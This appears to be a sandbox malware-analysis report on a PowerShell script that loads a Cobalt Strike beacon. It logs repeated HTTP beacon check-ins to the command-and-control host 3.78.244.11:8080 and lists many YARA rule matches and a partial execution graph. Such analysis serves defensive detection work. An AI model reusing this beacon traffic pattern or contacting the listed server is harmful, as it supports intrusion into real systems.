                                                  Nov 25, 2024 19:58:48.901372910 CET497398080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:48.901523113 CET497398080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:49.021559954 CET8080497393.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:59:10.821686983 CET8080497393.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:59:10.821760893 CET497398080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:10.891277075 CET497398080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:10.997363091 CET497678080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:11.017160892 CET8080497393.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:59:11.122184992 CET8080497673.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:59:11.122306108 CET497678080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:11.122419119 CET497678080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:11.242952108 CET8080497673.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:59:33.097146988 CET8080497673.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:59:33.097219944 CET497678080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:33.097309113 CET497678080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:33.199870110 CET498168080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:33.220618010 CET8080497673.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:59:33.337953091 CET8080498163.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:59:33.338037968 CET498168080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:33.338119030 CET498168080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:33.510299921 CET8080498163.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:59:55.285233974 CET8080498163.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:59:55.285300970 CET498168080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:55.285366058 CET498168080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:55.388755083 CET498648080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:55.409780979 CET8080498163.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:59:55.508778095 CET8080498643.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:59:55.508882046 CET498648080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:55.509006023 CET498648080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:55.629020929 CET8080498643.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:00:17.416872025 CET8080498643.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:00:17.416992903 CET498648080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:17.483669043 CET498648080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:17.594501019 CET499158080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:17.606303930 CET8080498643.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:00:17.716789007 CET8080499153.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:00:17.716885090 CET499158080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:17.716974974 CET499158080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:17.837594986 CET8080499153.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:00:39.635977030 CET8080499153.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:00:39.636064053 CET499158080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:39.636106014 CET499158080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:39.746836901 CET499638080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:39.756062984 CET8080499153.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:00:39.878683090 CET8080499633.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:00:39.878782034 CET499638080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:39.878871918 CET499638080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:40.005953074 CET8080499633.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:01.824094057 CET8080499633.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:01.824176073 CET499638080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:01.824234009 CET499638080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:01.935704947 CET500118080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:01.944303989 CET8080499633.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:02.055871010 CET8080500113.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:02.056109905 CET500118080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:02.056224108 CET500118080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:02.178056955 CET8080500113.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:23.980669022 CET8080500113.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:23.980870008 CET500118080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:23.981081009 CET500118080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:24.090967894 CET500128080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:24.107604980 CET8080500113.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:24.216047049 CET8080500123.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:24.216146946 CET500128080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:24.216264963 CET500128080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:24.336365938 CET8080500123.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:46.137490034 CET8080500123.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:46.137578964 CET500128080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:46.137643099 CET500128080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:46.247189045 CET500138080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:46.257819891 CET8080500123.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:46.369203091 CET8080500133.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:46.369317055 CET500138080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:46.369400978 CET500138080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:46.492402077 CET8080500133.78.244.11192.168.2.4

                                                  HTTP Request Dependency Graph

                                                  • 3.78.244.11:8080

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.4497303.78.244.1180801900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 19:58:00.315752983 CET382OUTGET /dot.gif HTTP/1.1
                                                  Accept: */*
                                                  Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
                                                  Host: 3.78.244.11:8080
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.4497313.78.244.1180801900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 19:58:04.554482937 CET382OUTGET /dot.gif HTTP/1.1
                                                  Accept: */*
                                                  Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
                                                  Host: 3.78.244.11:8080
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.4497383.78.244.1180801900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 19:58:26.726310968 CET382OUTGET /dot.gif HTTP/1.1
                                                  Accept: */*
                                                  Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
                                                  Host: 3.78.244.11:8080
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.4497393.78.244.1180801900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 19:58:48.901523113 CET382OUTGET /dot.gif HTTP/1.1
                                                  Accept: */*
                                                  Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
                                                  Host: 3.78.244.11:8080
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.4497673.78.244.1180801900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 19:59:11.122419119 CET382OUTGET /dot.gif HTTP/1.1
                                                  Accept: */*
                                                  Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
                                                  Host: 3.78.244.11:8080
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.4498163.78.244.1180801900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 19:59:33.338119030 CET382OUTGET /dot.gif HTTP/1.1
                                                  Accept: */*
                                                  Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
                                                  Host: 3.78.244.11:8080
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.4498643.78.244.1180801900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 19:59:55.509006023 CET382OUTGET /dot.gif HTTP/1.1
                                                  Accept: */*
                                                  Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
                                                  Host: 3.78.244.11:8080
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.4499153.78.244.1180801900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 20:00:17.716974974 CET382OUTGET /dot.gif HTTP/1.1
                                                  Accept: */*
                                                  Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
                                                  Host: 3.78.244.11:8080
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.4499633.78.244.1180801900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 20:00:39.878871918 CET382OUTGET /dot.gif HTTP/1.1
                                                  Accept: */*
                                                  Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
                                                  Host: 3.78.244.11:8080
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.4500113.78.244.1180801900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 20:01:02.056224108 CET382OUTGET /dot.gif HTTP/1.1
                                                  Accept: */*
                                                  Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
                                                  Host: 3.78.244.11:8080
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.4500123.78.244.1180801900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 20:01:24.216264963 CET382OUTGET /dot.gif HTTP/1.1
                                                  Accept: */*
                                                  Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
                                                  Host: 3.78.244.11:8080
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.4500133.78.244.1180801900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 25, 2024 20:01:46.369400978 CET382OUTGET /dot.gif HTTP/1.1
                                                  Accept: */*
                                                  Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=
                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
                                                  Host: 3.78.244.11:8080
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:13:57:56
                                                  Start date:25/11/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1"
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.4122124036.0000022EF9EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                  • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                                                  • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                  • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                                                  • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.4114351286.0000022EF1952000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.4098790194.0000022EE28B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                  • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:1
                                                  Start time:13:57:56
                                                  Start date:25/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:0.5%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:3.6%
                                                    Total number of Nodes:166
                                                    Total number of Limit Nodes:4
                                                    execution_graph 41989 22efa0b1218 41994 22efa0b1184 CryptAcquireContextA 41989->41994 41992 22efa0b1245 41995 22efa0b11c2 CryptAcquireContextA 41994->41995 41998 22efa0b11e6 _DllMainCRTStartup 41994->41998 41996 22efa0b120c 41995->41996 41995->41998 41996->41992 41999 22efa0b10d0 GetSystemTimeAsFileTime clock 41996->41999 41997 22efa0b11fd CryptReleaseContext 41997->41996 41998->41997 41999->41992 42000 22ef9b288d4 42001 22ef9b28961 42000->42001 42004 22ef9b296b4 42001->42004 42003 22ef9b28a8f 42007 22ef9b29723 42004->42007 42005 22ef9b2994f 42005->42003 42006 22ef9b2976e LoadLibraryA 42006->42007 42007->42005 42007->42006 42008 22efa0d1b48 42009 22efa0d1b64 42008->42009 42011 22efa0d1b69 42008->42011 42022 22efa0d92d0 GetSystemTimeAsFileTime GetCurrentThreadId QueryPerformanceCounter __security_init_cookie 42009->42022 42012 22efa0d1bf4 42011->42012 42019 22efa0d1bbe 42011->42019 42023 22efa0d19e8 42011->42023 42012->42019 42068 22efa0c93e0 42012->42068 42014 22efa0d1c12 42016 22efa0d1c3b 42014->42016 42018 22efa0c93e0 _DllMainCRTStartup 207 API calls 42014->42018 42017 22efa0d19e8 _CRT_INIT 119 API calls 42016->42017 42016->42019 42017->42019 42020 22efa0d1c2e 42018->42020 42021 22efa0d19e8 _CRT_INIT 119 API calls 42020->42021 42021->42016 42022->42011 42024 22efa0d1a77 42023->42024 42029 22efa0d19fa _heap_init 42023->42029 42025 22efa0d1acd 42024->42025 42031 22efa0d1a7b _CRT_INIT 42024->42031 42026 22efa0d1ad2 42025->42026 42027 22efa0d1b30 42025->42027 42109 22efa0d40a8 TlsGetValue 42026->42109 42037 22efa0d1a03 _CRT_INIT 42027->42037 42110 22efa0d5808 10 API calls 2 library calls 42027->42110 42029->42037 42083 22efa0d59b0 45 API calls 7 library calls 42029->42083 42031->42037 42105 22efa0cff6c 12 API calls free 42031->42105 42035 22efa0d1a0f _RTC_Initialize 42035->42037 42042 22efa0d1a1f GetCommandLineA 42035->42042 42036 22efa0d1aa3 42047 22efa0d1ab2 _CRT_INIT 42036->42047 42106 22efa0d816c 11 API calls free 42036->42106 42037->42012 42041 22efa0d1aad 42107 22efa0d5a30 TlsFree _mtterm 42041->42107 42084 22efa0d937c 45 API calls 2 library calls 42042->42084 42047->42037 42108 22efa0d5a30 TlsFree _mtterm 42047->42108 42048 22efa0d1a31 42085 22efa0d7e40 42048->42085 42053 22efa0d1a3d 42055 22efa0d1a48 42053->42055 42056 22efa0d1a41 42053->42056 42101 22efa0d8ee0 55 API calls 3 library calls 42055->42101 42100 22efa0d5a30 